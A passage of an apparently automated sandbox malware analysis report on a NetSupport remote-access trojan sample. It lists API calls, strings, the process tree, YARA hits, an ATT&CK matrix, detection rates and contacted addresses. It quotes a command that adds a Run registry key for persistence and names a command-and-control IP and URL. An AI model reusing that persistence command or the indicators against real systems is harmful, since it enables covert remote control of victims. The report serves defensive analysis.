                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: file.exe, 00000000.00000002.1734404708.00000000011B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: bild.exe, 00000004.00000002.3582168391.0000000005C31000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3581039024.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000004.00000002.3581039024.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                Source: bild.exe, 00000005.00000003.1834085159.000000000086F000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.1834399853.0000000000872000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000009.00000003.1914790001.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-23444
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end nodegraph_4-58960
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DA75
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,4_2_11147750
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00424A5A mov eax, dword ptr fs:[00000030h]0_2_00424A5A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428AAA GetProcessHeap,0_2_00428AAA
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DA75
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00425B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00425B53
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DBC3 SetUnhandledExceptionFilter,0_2_0041DBC3
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041DD7C
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_11093080
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_110310C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11161D01
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116DD89
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_11093080
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_110310C0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11161D01
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116DD89
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4560
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,4_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exeJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E190
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109E910
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041D8CB cpuid 0_2_0041D8CB
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0041932F
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11173A35
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11173D69
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11173CC6
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoA,4_2_1116B38E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11173933
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_111739DA
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_1117383E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11173D2D
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11173C06
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11173D69
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoA,5_2_1116B38E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11173933
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_111739DA
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_1117383E
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11173A35
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173D2D
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11173C06
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173CC6
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0041C131
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,4_2_1103B160
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A8E0 GetVersionExW,0_2_0040A8E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,4_2_110D8200
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070090
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,5_2_110D8200
                                Source: Yara matchFile source: 5.2.bild.exe.820000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.bild.exe.820000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.bild.exe.820000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.bild.exe.820000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.6d100000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.6d100000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.6d0f0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.6d0f0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.820000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.6d100000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.820000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.6d0f0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.6c780000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.3754800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1915079530.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1834399853.0000000000858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7444, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7892, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 8168, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		3
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		2
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS44
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder                                		13
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets141
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Modify Registry                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556890 Sample: file.exe Startdate: 16/11/2024 Architecture: WINDOWS Score: 88 37 geo.netsupportsoftware.com 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 4 other signatures 2->51 8 file.exe 19 2->8         started        11 bild.exe 2->11         started        13 bild.exe 2->13         started        signatures3 process4 file5 25 C:\Users\Public\Public\...\remcmdstub.exe, PE32 8->25 dropped 27 C:\Users\Public\Public\Videos\...\pcicapi.dll, PE32 8->27 dropped 29 C:\Users\Public\Public\Videos\...\bild.exe, PE32 8->29 dropped 31 6 other files (3 malicious) 8->31 dropped 15 cmd.exe 1 8->15         started        process6 process7 17 bild.exe 16 15->17         started        21 conhost.exe 15->21         started        23 reg.exe 1 1 15->23         started        dnsIp8 33 45.61.128.74, 443, 49730 M247GB United States 17->33 35 geo.netsupportsoftware.com 104.26.0.231, 49731, 80 CLOUDFLARENETUS United States 17->35 39 Multi AV Scanner detection for dropped file 17->39 41 Contains functionalty to change the wallpaper 17->41 43 Delayed program exit found 17->43 signatures9

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                file.exe50%ReversingLabsWin32.Trojan.NetSupport
                                file.exe51%VirustotalBrowse

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Public\Videos\Video\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\HTCTL32.DLL3%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\PCICHEK.DLL1%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\PCICL32.DLL17%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\TCCTL32.DLL3%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Public\Videos\Video\bild.exe49%VirustotalBrowse
                                C:\Users\Public\Public\Videos\Video\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Public\Videos\Video\remcmdstub.exe13%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://45.61.128.74/fakeurl.htm0%VirustotalBrowse
                                http://45.61.128.74/fakeurl.htm0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.0.231
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.61.128.74/fakeurl.htmtrue
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspbbild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.pci.co.uk/supportfile.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        		high
                                        http://%s/testpage.htmwininet.dllbild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                          		high
                                          http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                            		high
                                            http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              		high
                                              http://www.symauth.com/rpa00file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                		high
                                                http://geo.netsupportsoftware.com/location/loca.aspxbild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
